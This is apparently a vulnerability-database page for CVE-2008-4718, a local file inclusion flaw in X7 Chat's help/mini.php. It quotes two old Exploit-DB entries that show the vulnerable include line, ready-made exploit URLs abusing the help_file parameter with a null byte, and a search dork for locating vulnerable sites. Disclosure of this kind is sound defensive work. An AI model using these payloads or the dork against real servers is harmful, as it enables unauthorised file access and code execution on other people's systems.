CVE-2008-4718
published 2008-10-23CVE-2008-4718: Directory traversal vulnerability in help/mini.php in X7 Chat 2.0.1 A1 and earlier allows remote attackers to include and execute arbitrary local files via…
PriorityP344high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.67%
83.8th percentile
Directory traversal vulnerability in help/mini.php in X7 Chat 2.0.1 A1 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the help_file parameter, a different vector than CVE-2006-2156.
Affected
13 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| x7_group | x7_chat | <= 2.0.1 | — |
| x7_group | x7_chat | — | — |
| x7_group | x7_chat | — | — |
| x7_group | x7_chat | — | — |
| x7_group | x7_chat | — | — |
| x7_group | x7_chat | — | — |
| x7_group | x7_chat | — | — |
| x7_group | x7_chat | — | — |
| x7_group | x7_chat | — | — |
| x7_group | x7_chat | — | — |
| x7_group | x7_chat | — | — |
| x7_group | x7_chat | — | — |
| x7_group | x7_chat | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
X7 Chat 2.0.1A1 - 'mini.php' Local File Inclusion
exploitdb·2008-09-27
CVE-2008-4718 X7 Chat 2.0.1A1 - 'mini.php' Local File Inclusion
X7 Chat 2.0.1A1 - 'mini.php' Local File Inclusion
---
[o] X7 Chat <= 2.0.1A1 Local File Inclusion Vulnerability
Software : X7 Chat version 2.0.5.1
Vendor : http://x7chat.com/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
[o] Vulnerable file
help/mini.php
include("./help/{$_GET['help_file']}");
[o] Exploit
http://localhost/[path]/help/mini.php?help_file=[LFI]%00
[o] Dork
"powered by x7 chat"
[o] Greetz
MainHack BrotherHood [ www.mainhack.com ]
VOP Crew [ Vaksin13 OoN_BoY Paman ]
H312Y yooogy mousekill }^-^{ k1tk4t
skulmatic olibekas ulga Cungkee str0ke
# milw0rm.com [2008-09-27]
Exploit-DB
X7 Chat 2.0.1A1 - Local File Inclusion
exploitdb·2008-09-27
CVE-2008-4718 X7 Chat 2.0.1A1 - Local File Inclusion
X7 Chat 2.0.1A1 - Local File Inclusion
---
-- JIKI Team [ JIKO + KIl1er + merwan-neo ] ---
# Author : jiko
# email : [email protected]
# Home : www.no-exploit.Com
# Script : X7 Chat Version 2.0.1
# Bug : Local File Inclusion Vulnerability
=========================JIkI Team===================
# Exploit :
http://localhost/[script]/help/mini.php?help_file=[file]
=========================JIKI Team===================
greetz : all my friend and all No-back members and tryag.Com Gold_M
Cochlain , Hcj , Hassin X , all muslims
visit: www.no-back.org & www.tryag.com & ==> www.no-exploit.Com
-- JIKI Team [ JIKO + KIl1er ] --
------== troops of Mohamed comming inchalah =-----------------
Ana muslim , Ana 3arabi , Ana Magribi , bladi maroc
# milw0rm.com [2008-09-27]
No writeups or analysis indexed.
http://securityreason.com/securityalert/4499https://exchange.xforce.ibmcloud.com/vulnerabilities/45495https://www.exploit-db.com/exploits/6592https://www.exploit-db.com/exploits/6607http://securityreason.com/securityalert/4499https://exchange.xforce.ibmcloud.com/vulnerabilities/45495https://www.exploit-db.com/exploits/6592https://www.exploit-db.com/exploits/6607
2008-10-23
Published